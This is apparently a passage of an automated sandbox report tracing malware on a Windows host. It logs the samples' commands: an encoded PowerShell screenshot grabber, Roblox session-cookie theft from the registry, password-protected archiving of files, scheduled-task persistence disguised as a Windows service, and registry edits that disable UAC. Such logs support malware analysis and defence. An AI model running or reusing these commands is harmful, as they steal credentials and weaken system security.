HQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="4⤵PID:4100
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=5⤵
- Suspicious behavior: EnumeratesProcesses
PID:3584 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1tlb50d5\1tlb50d5.cmdline"6⤵PID:3524
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84A0.tmp" "c:\Users\Admin\AppData\Local\Temp\1tlb50d5\CSC5D5CE727E49B474E97FBE6626F452EED.TMP"7⤵PID:4028
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:948
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:5036
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"4⤵PID:3876
-
C:\Windows\system32\attrib.exeattrib -r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4752
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:1092
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:3560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"4⤵PID:3352
-
C:\Windows\system32\attrib.exeattrib +r C:\Windows\System32\drivers\etc\hosts5⤵
- Drops file in Drivers directory
- Views/modifies file attributes
PID:4188
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:2688
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:980
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4032
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"4⤵PID:4756
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:5004
-
-
C:\Windows\system32\tree.comtree /A /F5⤵PID:4536
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:4080
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵
- Command and Scripting Interpreter: PowerShell
PID:3476
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"4⤵PID:3112
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY5⤵PID:3120
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37282\rar.exe a -r -hphai1723ontop "C:\Users\Admin\AppData\Local\Temp\7xR6s.zip" *"4⤵PID:2360
-
C:\Users\Admin\AppData\Local\Temp\_MEI37282\rar.exeC:\Users\Admin\AppData\Local\Temp\_MEI37282\rar.exe a -r -hphai1723ontop "C:\Users\Admin\AppData\Local\Temp\7xR6s.zip" *5⤵PID:4988
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic os get Caption"4⤵PID:4116
-
C:\Windows\System32\Wbem\WMIC.exewmic os get Caption5⤵PID:2976
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"4⤵PID:2480
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get totalphysicalmemory5⤵PID:3228
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"4⤵PID:1972
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid5⤵PID:1376
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe"C:\Users\Admin\AppData\Local\Temp\Files\aaa%20(3).exe"2⤵
- System Location Discovery: System Language Discovery
PID:3184
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"2⤵PID:1856
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f3⤵
- Scheduled Task/Job: Scheduled Task
PID:3316
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BJ1lvzcPEkxz.bat" "3⤵PID:5080
-
C:\Windows\system32\chcp.comchcp 650014⤵PID:1588
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost4⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3600
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"4⤵PID:1624
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
PID:3792
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IW7DipvPeqEX.bat" "5⤵PID:4988
-
C:\Windows\system32\chcp.comchcp 650016⤵PID:228
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost6⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2464
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"6⤵
- Suspicious use of SetWindowsHookEx
PID:4920 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f7⤵
- Scheduled Task/Job: Scheduled Task
PID:3584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\p1QouXYjKb7o.bat" "7⤵PID:1120
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:4656
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost8⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4768
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"8⤵PID:4116
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:4672
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fCq3giEBmCpY.bat" "9⤵PID:4604
-
C:\Windows\system32\chcp.comchcp 6500110⤵PID:3692
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost10⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1816
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"10⤵PID:2272
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f11⤵
- Scheduled Task/Job: Scheduled Task
PID:1904
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XTUcvGBUC3TF.bat" "11⤵PID:4080
-
C:\Windows\system32\chcp.comchcp 6500112⤵PID:4608
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost12⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"12⤵PID:3324
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f13⤵
- Scheduled Task/Job: Scheduled Task
PID:2268
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kkSsmWi2EMKy.bat" "13⤵PID:3196
-
C:\Windows\system32\chcp.comchcp 6500114⤵PID:4656
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost14⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3304
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"14⤵PID:1936
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f15⤵
- Scheduled Task/Job: Scheduled Task
PID:4036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\S8qVTrCEaSp3.bat" "15⤵PID:236
-
C:\Windows\system32\chcp.comchcp 6500116⤵PID:3792
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost16⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1520
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"16⤵PID:3968
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f17⤵
- Scheduled Task/Job: Scheduled Task
PID:1936
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1GxM5eE8Qi5e.bat" "17⤵PID:2320
-
C:\Windows\system32\chcp.comchcp 6500118⤵PID:1624
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost18⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2300
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"18⤵PID:2664
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f19⤵
- Scheduled Task/Job: Scheduled Task
PID:3440
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Hq9rHIl0BrQi.bat" "19⤵PID:1568
-
C:\Windows\system32\chcp.comchcp 6500120⤵PID:2376
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost20⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1856
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"20⤵PID:4744
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f21⤵
- Scheduled Task/Job: Scheduled Task
PID:1924
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\meteYDeRyYxs.bat" "21⤵PID:3308
-
C:\Windows\system32\chcp.comchcp 6500122⤵PID:3956
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost22⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3968
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"22⤵PID:2764
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f23⤵
- Scheduled Task/Job: Scheduled Task
PID:2372
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Kd6KucOubCKi.bat" "23⤵PID:2724
-
C:\Windows\system32\chcp.comchcp 6500124⤵PID:1188
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost24⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4436
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"24⤵PID:2208
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f25⤵
- Scheduled Task/Job: Scheduled Task
PID:5028
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cDLYpJahjJBi.bat" "25⤵PID:1420
-
C:\Windows\system32\chcp.comchcp 6500126⤵PID:2200
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost26⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2528
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"26⤵PID:4704
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f27⤵
- Scheduled Task/Job: Scheduled Task
PID:1700
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yv1w8MQpvyBt.bat" "27⤵PID:1408
-
C:\Windows\system32\chcp.comchcp 6500128⤵PID:2480
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost28⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4316
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"28⤵PID:4192
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f29⤵
- Scheduled Task/Job: Scheduled Task
PID:4752
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oai1tvthkXZh.bat" "29⤵PID:2260
-
C:\Windows\system32\chcp.comchcp 6500130⤵PID:4224
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost30⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4560
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"30⤵PID:3600
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f31⤵
- Scheduled Task/Job: Scheduled Task
PID:1036
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CCx72q6RVzmj.bat" "31⤵PID:4188
-
C:\Windows\system32\chcp.comchcp 6500132⤵PID:4180
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost32⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2320
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"32⤵PID:3788
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f33⤵
- Scheduled Task/Job: Scheduled Task
PID:656
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\H2X31926pmGo.bat" "33⤵PID:3660
-
C:\Windows\system32\chcp.comchcp 6500134⤵PID:3664
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost34⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1924
-
-
C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"C:\Users\Admin\AppData\Local\Temp\Files\seksiak.exe"34⤵PID:1600
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Windows Security Service" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f35⤵
- Scheduled Task/Job: Scheduled Task
PID:4004
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NH3fI8rgwztF.bat" "35⤵PID:4752
-
C:\Windows\system32\chcp.comchcp 6500136⤵PID:4932
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost36⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3448
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\VB.NET%20CRYPTER%20V2.exe"C:\Users\Admin\AppData\Local\Temp\Files\VB.NET%20CRYPTER%20V2.exe"2⤵
- System Location Discovery: System Language Discovery
PID:468
-
-
C:\Users\Admin\AppData\Local\Temp\Files\retest.exe"C:\Users\Admin\AppData\Local\Temp\Files\retest.exe"2⤵
- System Location Discovery: System Language Discovery
PID:4160
-
-
C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"2⤵
- System Location Discovery: System Language Discovery
PID:3328 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\772E.tmp\772F.tmp\7730.bat C:\Users\Admin\AppData\Local\Temp\Files\pornhub_downloader.exe"3⤵PID:1804
-
C:\Windows\system32\mshta.exemshta vbscript:createobject("shell.application").shellexecute("C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE","goto :target","","runas",1)(window.close)4⤵
- Access Token Manipulation: Create Process with Token
PID:4800 -
C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE"C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE" goto :target5⤵
- System Location Discovery: System Language Discovery
PID:4924 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7951.tmp\7952.tmp\7953.bat C:\Users\Admin\AppData\Local\Temp\Files\PORNHU~1.EXE goto :target"6⤵PID:2056
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t reg_dword /d 0 /F7⤵
- UAC bypass
PID:4236
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F7⤵
- UAC bypass
PID:2340
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t reg_dword /d 0 /F7⤵
- UAC bypass
PID:5068
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "reg query HKEY_CLASSES_ROOT\http\shell\open\command"7⤵PID:2376
-
C:\Windows\system32\reg.exereg query HKEY_CLASSES_ROOT\http\shell\open\command8⤵PID:2300
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.pornhub.com/7⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4168 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x7c,0x84,0x108,0x74,0x12c,0x7ffddfc43cb8,0x7ffddfc43cc8,0x7ffddfc43cd88⤵PID:5044
-
-
